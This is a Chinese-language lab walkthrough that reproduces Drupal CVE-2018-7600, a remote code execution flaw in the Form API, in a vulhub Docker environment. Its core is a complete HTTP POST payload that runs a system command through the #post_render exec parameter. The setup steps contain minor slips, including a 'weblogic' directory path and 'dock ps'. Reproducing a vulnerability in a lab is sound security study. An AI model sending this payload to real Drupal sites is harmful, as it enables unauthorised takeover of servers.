目录
漏洞介绍
Drupal 是一款用量庞大的CMS,在Form API中存在一处远程代码执行漏洞。
影响版本
- Drupal 6.x
- Drupal 7.x
- Drupal 8.x
环境搭建
1.切换到drupal相关目录下,部署docker环境
cd /root/vulhub/weblogic/CVE-2018-7600
docker-compose build
docker-compose up -d
2.查看docker服务器情况
dock ps -a
3.环境启动后,访问`http://your-ip:8080/`将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。
4.正常访问页面如下
漏洞复现
1.利用burp的Repeater模块发送以下数据
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
2.在Response中的Render查看返回结果